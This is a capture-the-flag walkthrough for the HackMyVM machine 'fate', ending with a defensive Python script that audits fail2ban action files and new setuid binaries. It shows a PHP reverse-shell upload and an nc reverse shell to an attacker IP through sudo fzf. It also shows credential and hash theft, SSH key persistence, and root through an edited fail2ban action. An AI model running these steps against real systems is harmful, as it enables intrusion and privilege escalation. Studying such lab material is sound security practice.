### Write up for https://hackmyvm.eu/machines/machine.php?vm=fate ###

ip=[targetIP]

Port scan with threader3000:

```
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|   3072 61:39:bc:89:db:98:a7:63:15:fe:13:54:01:22:8d:52 (RSA)
|   256 bb:a3:b7:24:76:9c:fd:27:8f:13:ef:f5:cf:4f:8b:ab (ECDSA)
|_  256 0c:af:8b:a0:fa:3f:7b:38:52:b4:93:a0:65:da:c0:7c (ED25519)
80/tcp    open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Site doesn't have a title (text/html).
13120/tcp open  http    Node.js Express framework
|_http-title: Gancio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Directory brute force:

```
feroxbuster -n -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u $url -x php,txt,html,zip,bak,htm,cgi -t 500 -e

301 GET 7l 11w 169c http://$ip/uploads => http://$ip/uploads/
200 GET 12l 27w 285c http://$ip/index.html
200 GET 1l 8w 0c http://$ip/upload.php
200 GET 12l 27w 285c http://$ip/
```

Visiting $url we see that we can upload a file, so let's try a php-reverse-shell. Start a listener first:

```
nc -lvnp [port]
```

The upload page answers: `The file revsh.php has been uploaded and renamed to db405464322afaa2bd0fd784b91011b6`

$url/uploads/ ----> 403

```
curl $url/uploads/db405464322afaa2bd0fd784b91011b6
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down.
// RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
```

The file comes back as plain source, so nothing executes it on request. After a lot of struggling trying both the normal name and the renamed one, I tried uploading a new file but running a background script before uploading (rename your php-revshell to rev.php):

```
while [[ "$(curl -s -o /dev/null -w ''%{http_code}'' http://$ip/uploads/rev.php)" != "200" ]]; do sleep 5; done
nc -lvnp [port]
```

We got a shell. Upgrade it:

```
python3 -c 'import pty;pty.spawn("/bin/bash")'
ctrl+z
stty -a; stty raw -echo;fg
export SHELL=bash
export TERM=xterm
stty rows (values from stty -a) cols (values from stty -a)
```

Basic enumeration:

```
find / -perm -u=s 2>/dev/null
getcap -r / 2>/dev/null
```

Nothing special, it's linpeas time:

```
python3 -m http.server 80    # on our machine
cd /tmp
wget <ourip>/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
```

Interesting linpeas output:

```
gancio 624 0.1 16.7 946532 167428 ? Ssl 17:10 0:09 node /usr/local/bin/gancio
/etc/systemd/system/gancio.service is executing some relative path
/etc/systemd/system/multi-user.target.wants/gancio.service is executing some relative path
uid=107(gancio) gid=113(gancio) groups=113(gancio)
drwxr-xr-x 4 gancio gancio 4096 Feb 16 10:51 gancio
-rw-r--r-- 1 gancio gancio 1282 Apr 3 17:10 /tmp/node-jiti/server-initialize.server.js.c8d34e02.js
```

Look for the gancio install:

```
find / -iname gancio 2>/dev/null
/var/lib/mysql/gancio
/usr/local/bin/gancio
/usr/local/share/.config/yarn/global/node_modules/gancio
/usr/local/share/.config/yarn/global/node_modules/.bin/gancio
/usr/local/share/.cache/yarn/v6/npm-gancio-1.4.0-a5c1a777ef5121604ff781af17417f88e64f3191/node_modules/gancio
/usr/local/share/.cache/yarn/v6/npm-gancio-1.4.0-a5c1a777ef5121604ff781af17417f88e64f3191/node_modules/gancio/.bin/gancio
/usr/local/share/.cache/yarn/v6/.tmp/01e94e889254727c8b933650006ea644/.bin/gancio
/opt/gancio

cd /opt/gancio
ls -alh
total 20K
drwxr-xr-x 4 gancio gancio 4.0K Feb 16 10:51 .
drwxr-xr-x 3 root   root   4.0K Feb 16 10:40 ..
-rw-r--r-- 1 gancio gancio  474 Feb 16 10:51 config.json
drwxr-xr-x 2 gancio gancio 4.0K Apr  3 17:10 logs
drwxr-xr-x 3 gancio gancio 4.0K Feb 16 10:51 uploads
```

The config holds the database credentials in plaintext:

```
cat config.json
  "log_level": "debug",
  "log_path": "/opt/gancio/logs",
  "db": {
    "dialect": "mariadb",
    "storage": "",
    "host": "localhost",
    "database": "gancio",
    "username": "******",
    "password": "******",
    "logging": false,
    "dialectOptions": {
      "autoJsonMap": false
```

```
mysql -u[username] -p[password]
show databases;
use gancio
show tables;
select * from users;
```

We get two hashes. `exit`, then `pico hashes` and add the two hashes:

```
john --wordlist=/usr/share/wordlists/rockyou.txt hash
```

You will only get connor's password.

```
ssh connor@$ip
sudo -l
Matching Defaults entries for connor on fate:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User connor may run the following commands on fate:
    (john) NOPASSWD: /usr/bin/fzf
```

Let's check GTFOBins: nothing. So look at the tool's own options:

```
sudo -u john /usr/bin/fzf --help
sudo -u john /usr/bin/fzf --preview 'nc <yourip> 1234 -e /bin/bash'
```

```
nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.6] 58448
id
uid=1001(john) gid=1001(john) groups=1001(john)
```

Add an SSH key so we get a proper shell as john:

```
cd
mkdir .ssh
chmod 755 .ssh
cd .ssh
echo "your id_ssh.pub" >> authorized_keys
chmod 655 authorized_keys
exit
```

```
ssh john@$ip
ls
cat user.txt
sudo -l
User john may run the following commands on fate:
    (root) NOPASSWD: /usr/bin/systemctl restart fail2ban
```

After some Google searching I found two ways: /etc/fail2ban/action.d/iptables-multiport.conf and /etc/fail2ban/action.d/iptables-common.conf. The first one didn't work for me.
```
cd /tmp
echo "chmod +s /bin/bash" > iptables
chmod +x iptables
ls -alh /bin/bash
-rwxr-xr-x 1 root root 1.2M Aug  4  2021 /bin/bash
pico /etc/fail2ban/action.d/iptables-common.conf
```

In that file, find:

```
# Option:  iptables
# Notes.:  Actual command to be executed, including common to all calls options
# Values:  STRING
iptables = iptables <lockingopt>
```

and change it to:

```
iptables = /tmp/iptables <lockingopt>
```

Save and close, then keep an eye on the binary:

```
watch -n 0 ls -alh /bin/bash
```

Open a new terminal and `ssh john2@$ip`; try a few times (the failed logins make fail2ban fire its ban action, which now runs our script as root) and you will see:

```
-rwsr-sr-x 1 root root 1.2M Aug  4  2021 /bin/bash
```

```
john@fate:/tmp$ /bin/bash -p
bash-5.1# ls /root
cat /root/root.txt
```
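The root step above works because two things were wrong at once: a fail2ban action file that a non-root user could edit, which also named `iptables` by a bare name instead of an absolute path, and nothing watching for a new setuid bit on `/bin/bash`. The following Python script is an added example (not part of this write-up and not fail2ban's own tooling) that checks for all three from the defender's side. The `COMMAND_OPTIONS` set, the `WEAK_CONF`/`FIXED_CONF` excerpts and every file it creates are constructed assumptions; point `main`-style usage at the real `/etc/fail2ban/action.d` and a stored setuid baseline on a live host.

```python
"""Audit helpers for the weaknesses this box chains for root: a fail2ban action
config that non-root users can edit (and that names iptables by a bare name
rather than an absolute path), and a setuid bit appearing on a binary that is
not in a known-good baseline. Added example; sample configs and paths are
constructed, not taken from the machine."""
import configparser
import os
import shlex
import stat
import tempfile

# fail2ban options that end up expanded into shell commands. Covers the stock
# iptables-* actions; the exact set is an assumption, extend it for other files.
COMMAND_OPTIONS = {"iptables", "ip6tables", "ipset", "nft", "firewallcmd",
                   "actionstart", "actionstop", "actioncheck", "actionban",
                   "actionunban", "actionflush"}

# Constructed excerpt in the shape of iptables-common.conf: the weak form uses a
# bare "iptables", the fixed form pins the absolute path.
WEAK_CONF = """\
[Definition]
actionban = <iptables> -I f2b-<name> 1 -s <ip> -j <blocktype>

[Init]
iptables = iptables <lockingopt>
lockingopt = -w
"""
FIXED_CONF = WEAK_CONF.replace("iptables = iptables ", "iptables = /usr/sbin/iptables ")


def audit_action_text(text):
    """Return (section, option, command) for every command given as a bare name."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    findings = []
    for section in cp.sections():
        for option, value in cp.items(section):
            if option not in COMMAND_OPTIONS or not value.strip():
                continue
            try:
                token = shlex.split(value)[0]
            except ValueError:            # unbalanced quotes: plain whitespace split
                token = value.split()[0]
            # "<tag>" expands another option (audited where that one is defined)
            # and "-flag" is an argument, so neither is the command itself.
            if token.startswith(("<", "-")):
                continue
            if not os.path.isabs(token):  # resolved through PATH of the root daemon
                findings.append((section, option, token))
    return findings


def audit_file_perms(path):
    """Describe how a non-root user could change this file (empty list if fine)."""
    st = os.stat(path)
    problems = []
    if st.st_uid != 0:
        problems.append("owned by uid %d, not root" % st.st_uid)
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        problems.append("group/world writable (%s)" % oct(stat.S_IMODE(st.st_mode)))
    return problems


def setuid_files(root):
    """Set of regular files under root carrying the setuid or setgid bit."""
    found = set()
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                found.add(path)
    return found


def new_setuid(root, baseline):
    """Paths that are setuid/setgid now but were not in the stored baseline."""
    return sorted(setuid_files(root) - set(baseline))


def demo():
    """Run all checks on constructed files in a temp dir and return the results."""
    work = tempfile.mkdtemp()
    conf = os.path.join(work, "iptables-common.conf")
    with open(conf, "w") as fh:
        fh.write(WEAK_CONF)
    os.chmod(conf, 0o664)                # group-writable, as on a misconfigured host
    fake_bash = os.path.join(work, "bash")
    with open(fake_bash, "w") as fh:
        fh.write("#!/bin/sh\n")
    os.chmod(fake_bash, 0o4755)          # the mode `chmod +s` leaves behind
    return {
        "weak": audit_action_text(WEAK_CONF),
        "fixed": audit_action_text(FIXED_CONF),
        "perms": audit_file_perms(conf),
        "new_setuid": new_setuid(work, baseline=set()),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

On a real host, run `audit_action_text` over each file in `/etc/fail2ban/action.d` and `audit_file_perms` over the same files, and store `setuid_files("/")` from a clean state so that `new_setuid` can be re-run from cron; any bare command name in an action, any action file not owned by root with mode 0644, and any new setuid entry is worth an alert, since a `NOPASSWD` restart of fail2ban turns an editable action file into code that runs as root.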